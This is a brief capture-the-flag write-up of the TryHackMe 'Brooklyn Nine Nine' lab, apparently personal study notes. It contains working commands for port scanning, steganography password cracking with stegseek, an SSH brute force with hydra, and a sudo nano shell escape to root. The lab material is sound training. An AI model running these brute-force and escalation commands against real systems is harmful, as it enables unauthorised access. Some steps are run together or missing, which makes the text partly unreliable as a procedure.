Brooklyn Nine Nine
Lab Setup
mkdir ~/Documents/TryHackMe/eJPT/Brooklyn99
cd ~/Documents/TryHackMe/eJPT/Brooklyn99
mkdir recon enumeration notes
touch/{README.md,vulns,creds}
export IP=10.10.106.147
export URL=http://$IPEnumeration
First thing that I do when I make a machine I scan for open ports. I do this with nmap and rustscan.
rustscan
rustscan -a $IP --ulimit 5000 -- -sC -sV -v -oN recon/rustscan.initnmap
nmap -Pn -p- -v -T4 --max-retries 5 $IP -oN recon/nmap.init;
cat recon/nmap.init | grep '/.*open'| cut -d '/' -f 1| tr '\n' ', '| sed 's/.$//g' > recon/ports;
sudo nmap -Pn -sS -sV -n -v -A -T4 -p $(cat recon/ports) $IP -oN recon/nmap.alltcp
Look for default page on website. In source code I found an interesting commentary.
<!-- Have you ever heard of steganography? -->So let’s download the image and use some stegano tools.
stegseek --crack brooklyn99.jpg ~/Documents/rockyou.txt
admin --> password
When I see the 80 port open I usually scan for files and directories, but I didn’t find anything. So let’s connect to FTP server with anonymous default user.
Jake has a weak password so let’s brute force ssh login.
hydra -l jake -P ~/Documents/rockyou.txt ssh://$IP
Now I have 2 users and for each of them one password to connect with ssh.
Exploitation
Connect with ssh and see the user flag in holt home directory.
Search on Gtfobins to see how to exploit this vulnerability.
sudo nano
^R^X
reset; sh 1>&0 2>&0
Last updated